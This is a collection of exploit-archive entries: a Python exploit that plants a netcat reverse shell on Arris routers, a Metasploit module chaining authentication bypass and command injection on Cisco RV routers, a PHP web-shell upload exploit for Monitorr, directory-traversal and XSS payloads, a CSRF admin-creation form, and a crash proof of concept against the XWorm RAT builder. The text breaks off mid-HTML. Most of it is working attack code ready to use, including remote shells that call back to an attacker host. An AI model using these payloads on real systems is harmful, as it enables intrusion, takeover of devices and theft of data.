<pre><code>c# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 17/11/2022<br /># Exploit Author: Yerodin Richards<br /># Vendor Homepage: https://www.commscope.com/<br /># Version: 9.1.103<br /># Tested on: TG2482A, TG2492, SBG10<br /># CVE : CVE-2022-45701<br /><br />import requests<br />import base64<br /><br />router_host = "http://192.168.0.1"<br />username = "admin"<br />password = "password"<br /><br />lhost = "192.168.0.6"<br />lport = 80<br /><br /><br />def main():<br /> print("Authorizing...")<br /> cookie = get_cookie(gen_header(username, password))<br /> if cookie == '':<br /> print("Failed to authorize")<br /> exit(-1)<br /> print("Generating Payload...")<br /> payload = gen_payload(lhost, lport)<br /> print("Sending Payload...")<br /> send_payload(payload, cookie)<br /> print("Done, check shell..")<br /><br />def gen_header(u, p):<br /> return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")<br /><br />def no_encode_params(params):<br /> return "&".join("%s=%s" % (k,v) for k,v in params.items())<br /><br />def get_cookie(header):<br /> url = router_host+"/login"<br /> params = no_encode_params({"arg":header, "_n":1})<br /> resp=requests.get(url, params=params)<br /> return resp.content.decode('UTF-8')<br /><br />def set_oid(oid, cookie):<br /> url = router_host+"/snmpSet"<br /> params = no_encode_params({"oid":oid, "_n":1})<br /> cookies = {"credential":cookie}<br /> requests.get(url, params=params, cookies=cookies)<br /><br />def gen_payload(h, p):<br /> return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"<br /><br />def send_payload(payload, cookie):<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)<br /> set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)<br /> <br /><br />if __name__ == '__main__':<br /> main()<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',<br /> 'Description' => %q{<br /> This module exploits two vulnerabilities, a session ID directory traversal authentication<br /> bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,<br /> and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.<br /> This access can then be used to pivot to other parts of the network. This module works on firmware<br /> versions 1.0.03.24 and below.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['linux', 'unix'],<br /> 'Author' => [<br /> 'Biem Pham', # Vulnerability Discoveries<br /> 'Neterum', # Metasploit Module<br /> 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb<br /> ],<br /> 'DisclosureDate' => '2021-11-02',<br /> 'Arch' => [ARCH_CMD, ARCH_ARMLE],<br /> 'References' => [<br /> ['CVE', '2022-20705'], # Authentication Bypass<br /> ['CVE', '2022-20707'], # Command Injection<br /> ['ZDI', '22-410'], # Authentication Bypass<br /> ['ZDI', '22-411'] # Command Injection<br /> ],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'Payload' => {<br /> 'BadChars' => '\'#'<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'Payload' => {<br /> 'BadChars' => '\'#'<br /> },<br /> 'CmdStagerFlavor' => [ 'wget', 'curl' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ]<br /> )<br /> end<br /><br /> # sessionid utilized later needs to be set to length<br /> # of 16 or exploit will fail. Tested with lengths<br /> # 14-17<br /> def generate_session_id<br /> return Rex::Text.rand_text_alphanumeric(16)<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => '/upload',<br /> 'headers' => {<br /> 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id<br /> }<br /> }, 10)<br /><br /> # A proper "upload" will trigger file creation. So the send_request_cgi call<br /> # above is an incorrect "upload" call to avoid creating a file on disk. The router will return<br /> # status code 405 Not Allowed if authentication has been bypassed by the above request.<br /> # The firmware containing this authentication bypass also contains the command injection<br /> # vulnerability that will be abused during actual exploitation. Non-vulnerable<br /> # firmware versions will respond with 403 Forbidden.<br /> if res.nil?<br /> return CheckCode::Unknown('The device did not respond to request packet.')<br /> elsif res.code == 405<br /> return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')<br /> elsif res.code == 403<br /> return CheckCode::Safe('The device is not vulnerable to exploitation.')<br /> else # Catch-all<br /> return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> res = send_exploit(cmd)<br /><br /> # Successful unix_cmd shells should not produce a response.<br /> # However if a response is returned, check the status code and return<br /> # Failure::NotVulnerable if it is 403 Forbidden.<br /> if target['Type'] == :unix_cmd && res&.code == 403<br /> fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')<br /> end<br /><br /> if target['Type'] == :linux_dropper<br /> fail_with(Failure::Unreachable, 'The target did not respond') unless res<br /> fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200<br /> begin<br /> body_json = res.get_json_document<br /> fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json<br /> rescue JSON::ParserError => e<br /> print_error("Failed: #{e.class} - #{e.message}")<br /> fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')<br /> end<br /> end<br /><br /> print_good('Exploit successfully executed.')<br /> end<br /><br /> def send_exploit(cmd)<br /> filename = Rex::Text.rand_text_alphanumeric(5..12)<br /> fileparam = Rex::Text.rand_text_alphanumeric(5..12)<br /> input = Rex::Text.rand_text_alphanumeric(5..12)<br /><br /> # sessionid utilized later needs to be set to length<br /> # of 16 or exploit will fail. Tested with lengths<br /> # 14-17<br /> sessionid = Rex::Text.rand_text_alphanumeric(16)<br /><br /> filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.<br /> pathparam = 'Configuration'<br /><br /> destination = "'; " + cmd + ' #'<br /><br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')<br /> multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')<br /> multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')<br /> multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')<br /> multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')<br /> multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))<br /><br /> # Escaping "/tmp/upload/" folder that does not contain any other permanent files<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => '/upload',<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'headers' => {<br /> 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid<br /> },<br /> 'data' => multipart_form.to_s<br /> }, 10)<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager(linemax: 120)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Author: TOUHAMI KASBAOUI<br /># Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/<br /># Software Link: N/A# Version: 2.1# Tested on: Windows 10<br /># CVE : N/A<br /><br />==================================================================<br />THE BUG : NULL pointer dereference -> DOS crash<br />==================================================================<br />The sophisticated XWorm Trojan is well exploited by EvilCoder, where they collect different features such as ransomware and keylogger TAs to make it more risky for victims. The Trojan assigned to victims suffers from a NULL pointer deference vulnerability, which could lead to a denial of service for the server builder of the threat actor by getting his IP address and port of command and control.<br />==================================================================<br />WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES<br />==================================================================<br />(160.b98): Access violation - code c0000005 (first chance)<br />First chance exceptions are reported before any exception handling.<br />This exception may be expected and handled.<br />eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c<br />eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />builder!XWorm.Client.isDisconnected+0xa9:<br />078f5a59 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=????????<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />MethodDesc: 055a86b4<br />Method Name: XWorm.Client.isDisconnected()<br />Class: 09fe9634<br />MethodTable: 055a86d8<br />mdToken: 06000730<br />Module: 01464044<br />IsJitted: yes<br />CodeAddr: 078f59b0<br />Transparency: Critical<br />MethodDesc: 055a86b4<br />Method Name: XWorm.Client.isDisconnected()<br />Class: 09fe9634<br />MethodTable: 055a86d8<br />mdToken: 06000730<br />Module: 01464044<br />IsJitted: yes<br />CodeAddr: 078f59b0<br />Transparency: Critical<br />Failed to request MethodData, not in JIT code range<br /><br />KEY_VALUES_STRING: 1<br /><br /> Key : AV.Dereference<br /> Value: NullPtr<br /><br /> Key : AV.Fault<br /> Value: Read<br /><br /> Key : Analysis.CPU.mSec<br /> Value: 6406<br /><br /> Key : Analysis.DebugAnalysisManager<br /> Value: Create<br /><br /> Key : Analysis.Elapsed.mSec<br /> Value: 12344<br /><br /> Key : Analysis.IO.Other.Mb<br /> Value: 152<br /><br /> Key : Analysis.IO.Read.Mb<br /> Value: 3<br /><br /> Key : Analysis.IO.Write.Mb<br /> Value: 181<br /><br /> Key : Analysis.Init.CPU.mSec<br /> Value: 48905<br /><br /> Key : Analysis.Init.Elapsed.mSec<br /> Value: 6346579<br /><br /> Key : Analysis.Memory.CommitPeak.Mb<br /> Value: 200<br /><br /> Key : CLR.BuiltBy<br /> Value: NET48REL1LAST_C<br /><br /> Key : CLR.Engine<br /> Value: CLR<br /><br /> Key : CLR.Version<br /> Value: 4.8.4515.0<br /><br /> Key : Timeline.OS.Boot.DeltaSec<br /> Value: 7496<br /><br /> Key : Timeline.Process.Start.DeltaSec<br /> Value: 6371<br /><br /> Key : WER.OS.Branch<br /> Value: vb_release<br /><br /> Key : WER.OS.Timestamp<br /> Value: 2019-12-06T14:06:00Z<br /><br /> Key : WER.OS.Version<br /> Value: 10.0.19041.1<br /><br /> Key : WER.Process.Version<br /> Value: 2.1.0.0<br /><br /><br />NTGLOBALFLAG: 0<br /><br />PROCESS_BAM_CURRENT_THROTTLED: 0<br /><br />PROCESS_BAM_PREVIOUS_THROTTLED: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />EXCEPTION_RECORD: (.exr -1)<br />ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 00000000<br />Attempt to read from address 00000000<br /><br />FAULTING_THREAD: 00000b98<br /><br />PROCESS_NAME: builder.exe<br /><br />READ_ADDRESS: 00000000 <br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE_STR: c0000005<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 00000000<br /><br />IP_ON_HEAP: 078f5a59<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />STACK_TEXT: <br />0113e568 73140556 00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9<br />0113e574 7314373a 0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34<br />0113e5c8 7321f0d1 c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b<br />0113e608 7321f1d6 731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55<br />0113e90c 7212853c 00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838<br />0113e930 72114a9d 00000000 00000000 00000000 mscorlib_ni!<br />0113e94c 6e14bf55 00000000 00000000 00000000 mscorlib_ni!<br />0113e968 6e14be68 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113e990 72118604 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113e9f4 72118537 00000000 00000000 00000000 mscorlib_ni!<br />0113ea08 721184f4 00000000 00000000 00000000 mscorlib_ni!<br />0113ea24 6e14bdfa 00000000 00000000 00000000 mscorlib_ni!<br />0113ea40 6e14bb9a 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ea80 6e13b07f 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eacc 6e144931 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ead8 6e1445f7 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eaec 6e13af53 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eaf4 6e13aee5 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eb08 6e13a820 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eb58 0146d08e 00000000 00000000 00000000 System_Windows_Forms_ni!<br />WARNING: Frame IP not in any known module. Following frames may be wrong.<br />0113eb8c 7650148b 000606f4 0000c250 00000000 0x146d08e<br />0113ebb8 764f844a 05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b<br />0113ec9c 764f61ba 05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a<br />0113ed10 764f5f80 0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a<br />0113ed1c 6e19e5ed 0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10<br />0113ed58 6e14b44f 00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed<br />0113eddc 6e14b03d 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ee30 6e14ae93 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ee5c 014b2694 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ee84 014b2211 00000000 00000000 00000000 0x14b2694<br />0113eeac 014b1871 00000000 00000000 00000000 0x14b2211<br />0113eef8 014b08b7 00000000 00000000 00000000 0x14b1871<br />0113ef28 73140556 00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f<br />0113ef34 7314373a 0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34<br />0113ef88 73149adb 00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b<br />0113eff0 732bff7b 0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a<br />0113f114 732c065a 0113f158 00000000 c8874096 clr!RunMain+0x1b3<br />0113f380 732c0587 00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7<br />0113f864 732c0708 c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef<br />0113f8bc 732c082e c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c<br />0113f8fc 732bc235 c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc<br />0113f938 7398fa84 84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d<br />0113f970 73a1e81e 73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6<br />0113f980 73a24338 73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e<br />0113f998 76b600f9 00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8<br />0113f998 77997bbe 00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19<br />0113f9f4 77997b8e ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0113fa04 00000000 00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br /><br />STACK_COMMAND: ~0s ; .cxr ; kb<br /><br />SYMBOL_NAME: builder!XWorm.Client.isDisconnected+a9<br /><br />MODULE_NAME: builder<br /><br />IMAGE_NAME: builder.exe<br /><br />FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected<br /><br />OS_VERSION: 10.0.19041.1<br /><br />BUILDLAB_STR: vb_release<br /><br />OSPLATFORM_TYPE: x86<br /><br />OSNAME: Windows 10<br /><br />IMAGE_VERSION: 2.1.0.0<br /><br />FAILURE_ID_HASH: {ab0d02c5-881b-c628-2858-a241c5c41b1f}<br /><br />Followup: MachineOwner<br />---------<br /><br />TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a)<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ChiKoi version 1.0 Directory Traversal Vulnerability Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0 |<br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] infested file : index.php & admin.php<br /><br /><!--<br /> Developed by: TanHongIT<br /> Website: https://tanhongit.com - https://tanhongit.net<br /> Github: https://github.com/TanHongIT<br />--><br /><?php<br />session_start();<br />require_once('lib/model.php');<br />require_once('lib/functions.php');<br />require_once('content/models/cart.php');<br />require "lib/statistics.php";<br />require "lib/counter.php";<br />// $count_file = 'logs/counter.txt';<br />// $ip_file = 'logs/ip.txt';<br />// function counting_ip()<br />// {<br />// $ip = $_SERVER['REMOTE_ADDR'];<br />// global $count_file, $ip_file;<br /><br />// if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {<br />// $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;<br />// file_put_contents($ip_file, $ip . "\n", FILE_APPEND);<br />// file_put_contents($count_file, ++$current_val);<br />// }<br />// }<br />// counting_ip();<br />if (isset($_GET['controller'])) $controller = $_GET['controller'];<br />else $controller = 'home';<br />if (isset($_GET['action'])) $action = $_GET['action'];<br />else $action = 'index';<br />$file = 'content/controllers/' . $controller . '/' . $action . '.php';<br />if (file_exists($file)) {<br /> require($file);<br />} else {<br /> show_404();<br />}<br /><br /><br />[+] use payload : ../../../../../../../../../etc/passwd<br /><br />[+] https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd<br /><br />[+] https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd<br /><br /><br />== Greetings to :===========================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />============================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ChiKoi version 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0 |<br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes<br /><br />[+] Use Payload : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/chikoiquan.tanhongitcom/<br /> <br />== Greetings to :===========================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />============================================================================================<br /></code></pre>
<pre><code># Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 09, 2023<br /># Vendor Homepage: https://github.com/Monitorr/<br /># Software Link: https://github.com/Monitorr/Monitorr<br /># Tested on: Ubuntu<br /># Version: v1.7.6<br /># Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability<br /># CVE: CVE-2020-28871<br /><br />import requests<br />import random<br />import string<br />#from requests.auth import HTTPBasicAuth<br />from colorama import (Fore as F, Back as B, Style as S)<br />BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT<br /><br />def payL():<br /> fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'<br /> tf1=requests.post(url+'/assets/php/upload.php',<br /> files=(<br /> ('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),))<br /> tf2=requests.get(url+'/assets/data/usrimg/'+fileName)<br /><br /> print(tf2.text)<br /><br />def sig():<br /> SIG = SB+FY+" "+FR+".-----..___.._____. "+FY+"\n"<br /> SIG += FY+" | .. >||__-__-_| \n"<br /> SIG += FY+" "+FR+"| |.' ,||_______ "+FY+"\n"<br /> SIG += FY+" | _ < ||__-__-_|"+FR+"* * *"+FY+" \n"<br /> SIG += FY+" | |\ \ ||__-__-_\n"<br /> SIG += FY+" "+FR+"|___ \_ \||_______| "+FY+"\n"<br /> SIG += FY+"\n"+" _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST<br /> return SIG<br /><br />def argsetup():<br /> about = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST<br /> return about<br /><br />if __name__ == "__main__":<br /> header = SB+FT+"\n"+' '+FR+'retrymp3\n'+ST<br /> print(header)<br /> print(sig())<br /> print(argsetup())<br /> #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}<br /> url=input("Enter the base url: ")<br /> cmd=input("Command: ")<br /> payL()<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WEBY v.1.2.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(32-bit) | <br />| # Vendor : https://ทําเว็บหาดใหญ่.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />The infected file is the /user.php<br /><br />Inside the folder /admin/user/<br /><br />Line 46 we note that it used the variable (_GET $).<br /><br />When using method="get" in HTML forms, all names and values within the <input> tag will appear on the browser's URL.<br /><br />Remark :<br /><br />Use this method when sending important data such as a password or other sensitive information. <br />A bookmark can be used to mark the page, which can be useful in some cases.<br />The method you get is suitable when sending large amounts of data.<br /><br />There are two properties that the <form> element must have for it to function:<br /><br />- action property: Contains the link to the page you will go to when you click the submit button.<br />- method: Defines how to send the data entered in the form, and it has two methods, GET and POST.<br /><br />This data is usually sent to the host (Server) where it is stored. <br />This data is processed using programming languages that run on the host such as PHP<br />So the form consists of a set of fields that work together to accomplish a specific function. <br />For example, the login form on almost all sites consists of three fields:<br />Name or email field. <“input type="text> or <"input type="email>".<br />The password input field <“input type=”password> .<br />Submit button <“input value="submit" type="submit>.<br /><br />The three fields must be present within one form <“form action="/?Action=add” method=”POST> and so you can build any other form.<br /><br />We go to line 95<br /><br /><form action="?Action=add" role="form" method="post" enctype='multipart/form-data'><br /><br />property method specifies how the data entered in the form is sent, the HTTP method used to send the data (GET or POST) .<br />property action specifies the action that will occur when the user clicks the submit button.<br /><br />The action that takes place is to send the data entered in the form to the same file on the host (Server),<br /><br />Line 80 uses the $strSQL variable to query the database.<br /><br />$strSQL .="('".$_POST["user"]."','".$_POST["pass"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["address"]."','".$_FILES["filUpload"]["name"]."') ";<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /admin/user/user.php?Action=plus <=== add new admin<br /><br />[+] Use Payload : /admin/user/user.php?Action=show <=== show new admin<br /><br />[+] http://127.0.0.1/WEBY/admin/user/user.php?Action=plus<br /><br />[+] Copy the code below and paste it into an HTML file.<br /><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /><link rel="stylesheet" type="text/css" href="http://haji-zowzow.com/admin/menu/main.css" /><br /><title>Setting User</title><br /></head><br /><br /><link rel="import" href="http://haji-zowzow.com/include/core-icon.html" /><br /><link rel="import" href="http://haji-zowzow.com/include/paper-ripple.html" /><br /><script src="http://haji-zowzow.com/js/txt.js"></script><br /> <!-- ลบ ถามก่อน --><br /><script type="text/javascript"><br /> function chkdel(){<br /> if(confirm(' ยืนยันการลบ ใช่ หรือ ไม่? !!! ')){<br /> return true; // ถ้าตกลง OK โปรแกรมก็จะทำงานต่อไป <br /> }else{<br /> return false; // ถ้าตอบ Cancel ก็คือไม่ต้องทำอะไร <br /> }<br /> }<br /></script><br /><!-- จบ --><br /><link rel="stylesheet" href="http://haji-zowzow.com/admin/color_plugin/css/colorpicker.css" type="text/css" /><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/jquery.js"></script><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/colorpicker.js"></script><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/eye.js"></script><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/layout.js?ver=1.0.2"></script><br /> <br /><script src="http://haji-zowzow.com/admin/menu/js/jquery-latest.min.js" type="text/javascript"></script><br /><body><br /><div class="sub_head">+++ จัดการ User</div><br /><br /><a href="?Action=plus"><br /><div class="fab red"><br /> <core-icon icon="add"></core-icon><br /> <paper-ripple class="circle recenteringTouch" fit></paper-ripple><br /></div><br /></a><br /><a href="http://haji-zowzow.com/admin/user/user.php?Action=show"><br /><div class="fab blue"><br /> <core-icon icon="menu"></core-icon><br /> <paper-ripple class="circle recenteringTouch" fit></paper-ripple><br /></div><br /></a> <br /><br /><br /><br /><div class="dialog" style="width:600px; height:auto;"><br /><form action="http://haji-zowzow.com/admin/user/user.php?Action=add" role="form" method="post" enctype='multipart/form-data'><br /><br /> <div class="form-group"><br /> <input type="text" class="form-control" id="exampleInputEmail1" name="user" required><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Username (รหัสผู้ใช้)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <input type="text" class="form-control" id="exampleInputEmail1" name="pass" required><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Password (รหัสผ่าน)</label><br /> </div><br /> <br /> <br /> <br /> <div class="form-group"><br /> <input type="text" class="form-control" name="name"><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Name (ชื่อ-สกุล)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <input type="text" class="form-control" name="tel"><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Telephone (เบอร์โทรศัพท์)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <input type="text" class="form-control" name="email"><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*E-mail (อีเมล์)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <textarea name="address" style="height:100px; padding:5px;" class="form-control"></textarea><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Address (ที่อยู่)</label><br /> </div><br /> <br /> <div class="form-group"> <br /> <input class="form-control" type="file" id="exampleInputFile" name="filUpload" style="visibility:hidden;"><br /> <label for="exampleInputFile" class="button_m raised 